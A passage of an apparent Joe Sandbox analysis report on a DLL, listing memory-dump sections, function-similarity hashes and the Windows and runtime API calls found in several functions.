                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseHandle$Event$CreateH_prolog
                              • String ID:
                              • API String ID: 2825413587-0
                              • Opcode ID: d519e66b9ae1febeffaef3b74187f631080edea840b578f0b4a5faa13c170e4c
                              • Instruction ID: 3e305fd02ca7ef200221a3a428e795cdf619d7e093f6fcfe6ac8fa6bd58873eb
                              • Opcode Fuzzy Hash: d519e66b9ae1febeffaef3b74187f631080edea840b578f0b4a5faa13c170e4c
                              • Instruction Fuzzy Hash: 1851CD717046459BDB00CF28CA84B9AB7F4EF8832CF294618F87997790DB35E805CB96
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                              • String ID:
                              • API String ID: 2782032738-0
                              • Opcode ID: bdb6a368898db23cce60cfab8629ab865d261dec7acaeb72aae285b892a37892
                              • Instruction ID: 933f1fb9f6b65ffb278d630ba29282213778e28f09cb956f45c10d65545bc336
                              • Opcode Fuzzy Hash: bdb6a368898db23cce60cfab8629ab865d261dec7acaeb72aae285b892a37892
                              • Instruction Fuzzy Hash: B541E331B016469BDB08CE69CA925AE77B6AF4136CB30822DE835C7B40D771DD418F52
                              APIs
                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6CED8CFA
                              • __isleadbyte_l.LIBCMT ref: 6CED8D28
                              • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000,?,00000000,00000000,?,6CEDC1D0,?,00BFBBEF,00000003), ref: 6CED8D56
                              • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000,?,00000000,00000000,?,6CEDC1D0,?,00BFBBEF,00000003), ref: 6CED8D8C
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                              • String ID:
                              • API String ID: 3058430110-0
                              • Opcode ID: 28c4e4ca8868cee364f6b1291e563dce4409286dbf533b5a9218f75b064fd511
                              • Instruction ID: 612fc8eba0294dd49be5a7e96fc45283c2ca2a435eccce29088766c76ef5bd94
                              • Opcode Fuzzy Hash: 28c4e4ca8868cee364f6b1291e563dce4409286dbf533b5a9218f75b064fd511
                              • Instruction Fuzzy Hash: C331C23160524AAFDB218E25C844BAA7BB9FF42318F32511AE861976D0D730E852CBD1
                              APIs
                              • htons.WS2_32(?), ref: 6CEB46B2
                                • Part of subcall function 6CEB448F: __EH_prolog.LIBCMT ref: 6CEB4494
                                • Part of subcall function 6CEB448F: std::bad_exception::bad_exception.LIBCMT ref: 6CEB44A9
                              • htonl.WS2_32(00000000), ref: 6CEB46C9
                              • htonl.WS2_32(00000000), ref: 6CEB46D0
                              • htons.WS2_32(?), ref: 6CEB46E4
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
                              • String ID:
                              • API String ID: 3882411702-0
                              • Opcode ID: 8b33ce63ffe1be535e66ed8091c25c62c93c2d2b41baa4f3f259647792ddbddc
                              • Instruction ID: 509c7893d2aa3d1c9deaa89c73299122e0a0d0147d2d24bccf99b0f0e9ffad4b
                              • Opcode Fuzzy Hash: 8b33ce63ffe1be535e66ed8091c25c62c93c2d2b41baa4f3f259647792ddbddc
                              • Instruction Fuzzy Hash: EA118276600258ABCF01DFA4C9859AAB7B9EF0E315F10845AFC05EF244EB719D14C7A1
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                              • String ID:
                              • API String ID: 3016257755-0
                              • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                              • Instruction ID: c23c21f39a4b820c8a1a385926a2e312740998666ecc509bfd1a34a1a430ec9a
                              • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                              • Instruction Fuzzy Hash: 5B0172B200114AFBCF029F84DC418DE3F36FB09258B668519FE2859530D336D572AB81
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CEB27E2
                              • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 6CEB27F8
                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?,?,?,?,?,6CEB3F7F,?,?,?,?,?,Xll,00000000), ref: 6CEB280B
                              • InterlockedExchange.KERNEL32(?,00000001), ref: 6CEB2834
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601602481.000000006CF58000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601617241.000000006CF5C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_6ceb0000_loaddll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExchangeInterlocked$CompareCompletionH_prologPostQueuedStatus
                              • String ID:
                              • API String ID: 2927615140-0
                              • Opcode ID: 19338eb7addecd12f1d9a0dbb41c622998f862f589771f642ffd2cca2ae0a531
                              • Instruction ID: 1a7b5788a11df1b8098b2776a1e0e23b6feb2aec1287c22feb7b95f7530e3099
                              • Opcode Fuzzy Hash: 19338eb7addecd12f1d9a0dbb41c622998f862f589771f642ffd2cca2ae0a531
                              • Instruction Fuzzy Hash: 03019E31900604ABD724DB50CE4AFEAB378FF15715F20062DF101A2AD0DBB0BA48CB60
                              APIs
                              • __EH_prolog.LIBCMT ref: 6CEB22B0
                              • InterlockedIncrement.KERNEL32(?), ref: 6CEB22BF
                              • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,?,?,?,?,?,6CEC6857,00000000,00000000), ref: 6CEB22D7
                              • InterlockedExchange.KERNEL32(?,00000001), ref: 6CEB2300
                              Memory Dump Source
                              • Source File: 00000000.00000002.3601130190.000000006CEB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CEB0000, based on PE: true
                              • Associated: 00000000.00000002.3601117312.000000006CEB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601153795.000000006CEE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601170393.000000006CEED000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601184703.000000006CEF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601199059.000000006CEF9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601212673.000000006CEFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601225954.000000006CEFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601239086.000000006CEFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601251949.000000006CF00000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601264976.000000006CF01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601279050.000000006CF05000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601296007.000000006CF09000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601309695.000000006CF0C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601323179.000000006CF0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601337240.000000006CF10000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601350111.000000006CF11000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601363410.000000006CF12000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601382914.000000006CF25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601397017.000000006CF27000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601410393.000000006CF28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601423386.000000006CF29000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601437931.000000006CF32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601451595.000000006CF34000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601464886.000000006CF36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601477513.000000006CF37000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601493750.000000006CF3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601506858.000000006CF3C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601520476.000000006CF3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601534061.000000006CF40000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601548351.000000006CF49000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601561334.000000006CF4C000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601574515.000000006CF4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.3601587525.000000006CF50000.00000080.00000001.01000000.00000003.sdmpDownload File
